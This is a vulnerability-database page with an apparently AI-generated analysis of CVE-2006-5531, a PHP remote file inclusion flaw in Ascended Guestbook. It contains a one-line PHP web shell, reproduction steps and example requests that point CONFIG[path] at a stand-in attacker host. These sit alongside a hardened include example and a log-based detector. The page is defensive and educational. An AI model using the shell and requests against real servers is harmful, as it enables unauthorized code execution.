CVE-2006-5531
Description
PHP remote file inclusion vulnerability in embedded.php in Ascended Guestbook 1.0.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[path] parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:a:ascended_development:ascended_guestbook:*:*:*:*:*:*:*:* Range: <=1.0.0
Patches
No patch is linked for this CVE; see "What the fix does" below.
Vulnerability mechanics
Root cause
"Unsanitized user input from the CONFIG[path] parameter is passed directly to a PHP file inclusion function, enabling remote file inclusion."
Attack vector
An attacker sends an HTTP GET request to `embedded.php` with the `CONFIG[path]` parameter set to a URL pointing to a remote PHP shell. The vulnerable script then includes and executes the attacker-controlled file, allowing arbitrary PHP code execution on the server. The exploit shown in [ref_id=1] constructs a request such as `embedded.php?CONFIG[path]=http://evil.com/shell.txt?cmd=ls` to achieve remote code execution.
Affected code
The vulnerable file is `embedded.php` in Ascended Guestbook 1.0.0 and earlier. The script unsafely uses the `CONFIG[path]` parameter from the HTTP request to include a remote file, without proper sanitization or validation.
What the fix does
No patch is provided in the bundle. The advisory [ref_id=1] does not include a fix; it only documents the exploit. To remediate this vulnerability, the application should stop using user-supplied input in file inclusion functions such as `include()` or `require()` altogether, or map the request value onto a strict allowlist of local files under a fixed directory and resolve the result (for example with `realpath()`) before including it. As defense in depth, the PHP configuration should disable includes from URLs (`allow_url_include=Off`, and `allow_url_fopen=Off` where the application does not need remote streams).
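To make the mechanism and the remediation concrete, here is an added example that is not the Ascended Guestbook source (this page does not include it): a reconstruction of the vulnerable include pattern next to a hardened replacement. The `$CONFIG` array and the `CONFIG[path]` parameter come from the advisory; the appended file name `guestbook.inc.php`, the `theme` selector, the `includes/` directory and the allowlist are assumptions made for illustration.

```php
<?php
// Added example, not the project's code. The real embedded.php is not on
// this page; the include target and directory layout below are assumptions.

// --- Vulnerable pattern (reconstruction) ---
// With register_globals=On, a request for
//   embedded.php?CONFIG[path]=http://attacker/shell.txt?cmd=ls
// populates $CONFIG['path'] directly. Whatever the script appends after the
// '?' is sent to the attacker's server as a query string, so the remote file
// is fetched and executed whenever PHP allows URL includes.
function vulnerable_include(array $CONFIG): void
{
    include $CONFIG['path'] . '/guestbook.inc.php';   // attacker controls the prefix
}

// --- Hardened form ---
// 1. Never build an include path from request data; start from a fixed base.
// 2. Accept only a short selector from an allowlist.
// 3. Resolve with realpath() and confirm the result stays inside the base.
const INCLUDE_BASE = __DIR__ . '/includes';           // assumed layout
const ALLOWED_THEMES = ['default', 'compact'];        // assumed allowlist

function safe_include(string $theme): void
{
    if (!in_array($theme, ALLOWED_THEMES, true)) {
        http_response_code(400);
        exit('invalid theme');
    }
    $base = realpath(INCLUDE_BASE);
    $path = realpath(INCLUDE_BASE . '/' . $theme . '/guestbook.inc.php');
    // realpath() returns false for missing files and collapses "../";
    // the prefix check rejects anything that resolved outside $base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(400);
        exit('invalid include path');
    }
    include $path;
}

// Read the selector explicitly from $_GET instead of relying on register_globals.
$theme = (isset($_GET['theme']) && is_string($_GET['theme'])) ? $_GET['theme'] : 'default';
safe_include($theme);
```

The hardened version never lets a URL reach `include` at all: a remote value fails the allowlist check before any path is built, and even a local value that slipped past it would be caught by the `realpath()` prefix check. Pair it with `allow_url_include=Off` in php.ini so that a future regression in the application cannot reopen the remote-include path.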
Preconditions
- config: The target must be running Ascended Guestbook 1.0.0 or earlier.
- network: The attacker must have network access to the web server hosting the vulnerable script.
- config: PHP must permit includes from URLs. On PHP 5.2 and later this is the `allow_url_include` setting (off by default); on the PHP 4 and 5.0/5.1 releases current when this CVE was published there was no separate switch, and `allow_url_fopen` (on by default) governed remote includes.
- config: The request must be able to populate `$CONFIG['path']`. The `CONFIG[path]` parameter form used in the exploit is the signature of `register_globals` being enabled; the page does not show how the script itself reads the parameter.
Reproduction
1. Host a PHP shell (e.g., `shell.txt` containing `<?php passthru($_GET["cmd"]);?>`) on an attacker-controlled web server.
2. Send a GET request to the target: `http://target/embedded.php?CONFIG[path]=http://attacker/shell.txt?cmd=ls`.
3. The output of the `ls` command will be returned in the HTTP response, confirming remote code execution [ref_id=1].
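The reproduction above leaves a clear footprint in the web server's access log: a request for `embedded.php` whose `CONFIG[path]` value is a URL. The following added example (written for this page, not taken from the advisory or the project) parses Apache combined-format lines and flags that shape. The log lines are constructed for the example, and the hosts `attacker.example` and the IPs are documentation addresses; the detector also generalizes beyond this CVE by optionally inspecting every query parameter, not only `CONFIG[path]`.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /guestbook/embedded.php?CONFIG[path]=http://attacker.example/shell.txt?cmd=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:55:40 +0000] "GET /guestbook/embedded.php?CONFIG%5Bpath%5D=ftp%3A%2F%2Fattacker.example%2Fs.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2006:13:56:01 +0000] "GET /guestbook/embedded.php?CONFIG[path]=themes/default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2006:13:57:12 +0000] "GET /guestbook/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Client IP, method and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Stream wrappers that allow_url_include / allow_url_fopen make includable.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?|php|data)://', re.IGNORECASE)


def find_rfi_attempts(log_text, param_names=("CONFIG[path]",)):
    """Return one dict per request whose watched parameter carries a URL.

    param_names: query parameter names to inspect (after percent-decoding),
    or None to inspect every parameter of every request.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        target = m.group("target")
        parts = urlsplit(target)
        # parse_qsl percent-decodes names and values, so CONFIG%5Bpath%5D and
        # CONFIG[path] are treated alike, and an encoded scheme is unmasked.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if param_names is not None and name not in param_names:
                continue
            if REMOTE_SCHEME_RE.match(value.strip()):
                hits.append({
                    "ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "script": parts.path,
                    "param": name,
                    "value": value,
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["script"]} {hit["param"]}={hit["value"]}')
```

The third sample line, where `CONFIG[path]` holds a relative directory, is deliberately not flagged: only values that resolve to a stream wrapper PHP would fetch are reported. Running the detector with `param_names=None` catches the same technique against other parameter names at the cost of more review work on legitimate URL-valued parameters.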
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.